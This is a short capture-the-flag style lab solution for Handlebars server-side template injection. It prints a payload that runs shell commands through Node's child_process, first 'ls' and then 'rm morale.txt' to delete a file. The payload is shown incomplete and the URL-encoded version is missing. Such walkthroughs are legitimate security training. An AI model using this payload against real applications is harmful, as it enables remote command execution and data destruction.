Lab Solution: Server-side template injection in an unknown language with a documented exploit

When viewing details of the first product, we get a message in URL:

/?message=Unfortunately this product is out of stock

Try /?message={{}} we get an error.

This page is using Handlebars template. According to Handlebars template injection and RCE in a Shopify app, we can use their payload to inject.

There is a comment mentioned the payload to execute a shell command.

And we have the payload to execute ‘ls‘ command.

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.push (lookup string.sub "constructor")}}
      {{#with string.split as |codelist|}}
        {{this.push "return require('child_process').execSync('ls');"}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}

URL encode this payload into:


We can see that there is a file named ‘morale.txt‘.

Change ‘ls‘ into ‘rm morale.txt‘ and execute the payload.

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